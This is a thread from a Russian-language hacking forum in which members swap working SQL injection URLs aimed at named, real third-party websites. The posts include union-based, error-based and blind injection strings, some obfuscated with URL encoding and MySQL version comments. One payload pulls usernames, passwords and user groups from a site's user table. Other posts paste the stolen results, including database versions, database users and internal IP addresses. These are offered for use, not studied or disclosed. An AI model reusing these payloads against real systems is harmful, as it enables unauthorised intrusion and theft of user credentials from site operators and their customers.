HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 19.05.2015, 00:41
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#[/COLOR][/COLOR] 
Код HTML:
HTML:
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database(),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#[/COLOR][/COLOR] 
этот error-base?

//можно крутить и как error и как union

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45%4c%65%63%74 1,2,database(),4,5/**/'1#[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where
[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]0x696e666f726d6174696f6e5f736368656d61[/COLOR][COLOR="#007700"]) and (@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]in[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:=[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3c6c693e[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#0000BB"]0x203a3a20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x203a3a20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3c62723e[/COLOR][COLOR="#007700"]))))[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]#[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f database()},4,5,user(),7,8#[/COLOR][/COLOR] 
Спасибо парню, за статью))

Господа, я потом обединю в один пост , не ругайтесь
 
Ответить с цитированием

  #52  
Старый 19.05.2015, 13:47
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Код:
Code:
http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a653d22352220636f6c6f723d2272656422203e7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e3c68723e,0x4461746142617365203a3a,database(),0x3c62723e56457273696f4e203a3a,version(),
0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e743e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -
 
Ответить с цитированием

  #53  
Старый 19.05.2015, 19:18
tiger_x
Guest
Сообщений: n/a
Провел на форуме:
7357

Репутация: 7
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Код HTML:
HTML:
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((
Код HTML:
HTML:
http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29,user%28%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
это error-base
 
Ответить с цитированием

  #54  
Старый 19.05.2015, 21:01
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от Звездачет  
Звездачет said:

лично этой теме дублей нет
К примеру:

https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:spectehsnab.ru

https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:mmpris.ru
 
Ответить с цитированием

  #55  
Старый 20.05.2015, 02:22
nopony
Guest
Сообщений: n/a
Провел на форуме:
1814

Репутация: 8
По умолчанию

Код:
Code:
http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27
 
Ответить с цитированием

  #56  
Старый 20.05.2015, 02:37
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию

 
Ответить с цитированием

  #57  
Старый 20.05.2015, 11:11
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

Цитата:
5.5.29-0ubuntu0.12.04.1

childensgarden@localhost

childrensgarden_dk


Цитата:
5.5.42-37.1-log

Sql533637@62.149.130.42

Sql533637_1
 
Ответить с цитированием

  #58  
Старый 20.05.2015, 13:58
Bezlishke
Guest
Сообщений: n/a
Провел на форуме:
9828

Репутация: 3
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

dsn: 'mysql:host=localhos -Если я не ошибаюсь, то это ключевая строка
Суть вопроса была не в этом.

Код:
Code:
http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+
5.1.73-2+squeeze+build1+1-log

abrasifsbase

abrasifsbase@10.0.65.161
 
Ответить с цитированием

  #59  
Старый 21.05.2015, 16:25
Cassie)
Guest
Сообщений: n/a
Провел на форуме:
506

Репутация: 1
По умолчанию

Слепые SQL

nightclub-spb.ru/show_club.php?id=115' AND substring(@@version, 1, 1)='5

tushinec.ru/index.php?news_read=1310' AND substring(@@version, 1, 1)='5
 
Ответить с цитированием

  #60  
Старый 21.05.2015, 18:34
Cassie)
Guest
Сообщений: n/a
Провел на форуме:
506

Репутация: 1
По умолчанию

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ